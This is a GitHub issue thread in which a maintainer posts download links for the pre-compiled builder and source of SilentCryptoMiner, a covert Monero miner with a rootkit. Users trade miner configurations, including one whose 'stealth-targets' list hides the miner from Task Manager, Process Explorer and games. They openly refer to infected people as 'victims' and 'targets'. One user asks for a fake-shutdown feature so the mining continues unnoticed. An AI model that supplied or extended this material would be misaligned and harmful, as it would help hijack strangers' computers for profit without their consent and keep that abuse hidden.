### ISSUE TITLE
(Request For My Man UnamSanctum)

### ISSUE THREAD

**Issue by DumbStackz4L** [UnamSanctam/UnamWebPanel#363]
Hey Unam to me you are like the god of coding. And i was wondering if you could make a update to the silent XMR 
mining repository. My request is if you could just update the version of xmrig from V6.15.2 to the latest one. That is all I was requesting by the way you are very talented with your work and I hope the appeal for the silent mining repository comes back. If you are not able to upload it on here maybe just send me a file. And if you can't or don't want to that's fine just requesting. Thanks my guy :)

**Comment by UnamSanctam** [comment]
Yeah sure I can update it, currently I'm updating the rootkit but I'll post a .zip here later when it's done (version 3.4.0 with only the xmrig and rootkit updated).

**Comment by slemminggg** [comment]
> Yeah sure I can update it, currently I'm updating the rootkit but I'll post a .zip here later when it's done (version 3.4.0 with only the xmrig and rootkit updated).

Honestly man. You a fucking legend. Why you offer all this for free? No idea. But I'm all for it.

**Comment by DumbStackz4L** [comment]
> Yeah sure I can update it, currently I'm updating the rootkit but I'll post a .zip here later when it's done (version 3.4.0 with only the xmrig and rootkit updated).

Bro I will always remember you :) you're the best my man.

**Comment by UnamSanctam** [comment]
Sorry for the delay, I had to retrieve some of my older disks to find backups, and there was some extra testing I had to do. I will post all the links here and in any other issues that were opened.

## Here is an alternative new version 3.4.1:

Pre-compiled builder: https://mega.nz/file/l3sgAQoR#R2xfkCNGzsYtc5nFUBCb4_FogSZzeZqr7UBL4_F3AsI

Source code: https://mega.nz/file/lq9ECJzJ#eT1acS-Nxk7zh5j9LT4X66z1e0PAAcm9ZRU935hWja8

With the following changes compared to 3.4.0:
* Updated CPU miner (xmrig)
* Updated rootkit
* Fixed installation whitespace bug on some computers
* Removed Panthera and CN/GPU algorithms


## Here is the source and pre-compiled release of SilentCryptoMiner 3.4.0:
(the version that was on the repository when it was taken down):

Pre-compiled builder: https://mega.nz/file/4qcm3KiJ#E6P2vpJtU3UYWpTWgJhGIujEiPFnQ0n4aBoAIaZFrQo

Source code: https://mega.nz/file/Um03xTgY#gXm__-RFjCgYZUgQM72Fw2YB5zjwjwLxkbhL7hRKOSs


## Here are the example settings:
They have been changed from 2miners to nanopool since 2miners removed Monero mining in favor of Zephyr mining.

Example Settings Lite: https://mega.nz/file/Nyl3xAzR#QvUcm3R_06H_ycC1CpXrBC18kZxYkeAVcPjGpuL5mkU

Example Settings Full: https://mega.nz/file/Yr1xGJ7I#Y6Cn5PVZgPzn50V-conkEd22vmNRlmhRjRsoRnPeTvU

**Comment by tarekxxx** [comment]
there no examples for COnfigure
 Kawpaw 
 because i missed the wiki
 
 as Configuration ???
 how it should be in pastebin can you give me small example  !

**Comment by UnamSanctam** [comment]
>there no examples for COnfigure
Kawpaw
because i missed the wiki
as Configuration ???
how it should be in pastebin can you give me small example !

Sure, it's really the same as any other GPU configuration like etchash but just with a kawpow pool, wallet and algo option, here's an example for the Neruai coin (uses the kawpow algorithm) on 2miners:

```
{
    "url": "stratums://WALLET@xna.2miners.com:16060",
    "algo": "kawpow"
}
```
You can also add all the other normal options like the "max-gpu" option and "stealth-targets" option to it if wanted.

**Comment by tarekxxx** [comment]
this also working as MoneroOcean ? Just Change Link ? and port

**Comment by tarekxxx** [comment]
it should be like this sir
{
	"url": "stratums://WALLET:ETC~kawpow@gulf.moneroocean.stream:443",
	"algo": "kawpow",
	"max-gpu": 50,
	"idle-wait": 2,
	"idle-gpu": 90,
	"stealth-targets": 	"Taskmgr.exe,ProcessHacker.exe,perfmon.exe,procexp.exe,procexp64.exe,ModernWarfare.exe,ShooterGame.exe,ShooterGameServer.exe,ShooterGame_BE.exe,GenshinImpact.exe,FactoryGame.exe,Borderlands2.exe,EliteDangerous64.exe,PlanetCoaster.exe,Warframe.x64.exe,NMS.exe,RainbowSix.exe,RainbowSix_BE.exe,CK2game.exe,ck3.exe,stellaris.exe,arma3.exe,arma3_x64.exe,TslGame.exe,ffxiv.exe,ffxiv_dx11.exe,GTA5.exe,FortniteClient-Win64-Shipping.exe,r5apex.exe,VALORANT.exe,csgo.exe,PortalWars-Win64-Shipping.exe,FiveM.exe,left4dead2.exe,FIFA21.exe,BlackOpsColdWar.exe,EscapeFromTarkov.exe,TEKKEN 7.exe,SRTTR.exe,DeadByDaylight-Win64-Shipping.exe,PointBlank.exe,enlisted.exe,WorldOfTanks.exe,SoTGame.exe,FiveM_b2189_GTAProcess.exe,NarakaBladepoint.exe,re8.exe,Sonic Colors - Ultimate.exe,iw6sp64_ship.exe,RocketLeague.exe,Cyberpunk2077.exe,FiveM_GTAProcess.exe,RustClient.exe,Photoshop.exe,VideoEditorPlus.exe,AfterFX.exe,League of Legends.exe,Falluot4.exe,FarCry5.exe,RDR2.exe,Little_Nightmares_II_Enhanced-Win64-Shipping.exe,NBA2K22.exe,Borderlands3.exe,LeagueClientUx.exe,RogueCompany.exe,Tiger-Win64-Shipping.exe,WatchDogsLegion.exe,Phasmophobia.exe,VRChat.exe,NBA2K21.exe,NarakaBladepoint.exe,ForzaHorizon4.exe,acad.exe,bf4.exe,zula.exe,Adobe Premiere Pro.exe,GenshinImpact.exe,LeagueClient.exe",
	"kill-targets": "xmsdiag.exe",
	"stealth-fullscreen": true,
	"api-endpoint": ""
}

right ?

**Comment by UnamSanctam** [comment]
Yes, that looks correct.

**Comment by paulmaney1** [comment]
> Sorry for the delay, I had to retrieve some of my older disks to find backups, and there was some extra testing I had to do. I will post all the links here and in any other issues that were opened.
> 
> ## Here is an alternative new version 3.4.1:
> Pre-compiled builder: https://mega.nz/file/l3sgAQoR#R2xfkCNGzsYtc5nFUBCb4_FogSZzeZqr7UBL4_F3AsI
> 
> Source code: https://mega.nz/file/lq9ECJzJ#eT1acS-Nxk7zh5j9LT4X66z1e0PAAcm9ZRU935hWja8
> 
> With the following changes compared to 3.4.0:
> 
> * Updated CPU miner (xmrig)
> * Updated rootkit
> * Fixed installation whitespace bug on some computers
> * Removed Panthera and CN/GPU algorithms
> 
> ## Here is the source and pre-compiled release of SilentCryptoMiner 3.4.0:
> (the version that was on the repository when it was taken down):
> 
> Pre-compiled builder: https://mega.nz/file/4qcm3KiJ#E6P2vpJtU3UYWpTWgJhGIujEiPFnQ0n4aBoAIaZFrQo
> 
> Source code: https://mega.nz/file/Um03xTgY#gXm__-RFjCgYZUgQM72Fw2YB5zjwjwLxkbhL7hRKOSs
> 
> ## Here are the example settings:
> They have been changed from 2miners to nanopool since 2miners removed Monero mining in favor of Zephyr mining.
> 
> Example Settings Lite: https://mega.nz/file/Nyl3xAzR#QvUcm3R_06H_ycC1CpXrBC18kZxYkeAVcPjGpuL5mkU
> 
> Example Settings Full: https://mega.nz/file/Yr1xGJ7I#Y6Cn5PVZgPzn50V-conkEd22vmNRlmhRjRsoRnPeTvU

Thank you my brother, you are the best, hugs.

**Comment by DumbStackz4L** [comment]
unam is there a way for you to add a "disable power button or make it look like its shutting down but it keeps the miner still working" Maybe by muting audio and disconnecting external USB'S of all sorts. Like because I'm finding out that it drastically makes my profits like $90 a month to $15 a month. So if there is a way for you to do that it would make me happy make sure the display is definitely off too if you could work your magic I'd be happy :) your the best man.

**Comment by tarekxxx** [comment]
> unam is there a way for you to add a "disable power button or make it look like its shutting down but it keeps the miner still working" Maybe by muting audio and disconnecting external USB'S of all sorts. Like because I'm finding out that it drastically makes my profits like $90 a month to $15 a month. So if there is a way for you to do that it would make me happy make sure the display is definitely off too if you could work your magic I'd be happy :) your the best man.

i think its will not be healthy and victim will notice it

**Comment by tarekxxx** [comment]
![Screenshot (690)](https://github.com/user-attachments/assets/1e4df80f-3645-4aeb-a74b-1654d41a1fa0)
i do install GPU on 4060 but seems not working and not appear in pool and since i disable webpanel because some security reasons but not appear in POOL at all

**Comment by DumbStackz4L** [comment]
> > unam is there a way for you to add a "disable power button or make it look like its shutting down but it keeps the miner still working" Maybe by muting audio and disconnecting external USB'S of all sorts. Like because I'm finding out that it drastically makes my profits like $90 a month to $15 a month. So if there is a way for you to do that it would make me happy make sure the display is definitely off too if you could work your magic I'd be happy :) your the best man.
> 
> i think its will not be healthy and victim will notice it

I understand but my targets are pretty dumb and know nothing about computers. So if Unam you could take some time and do it I would be very greatful :)
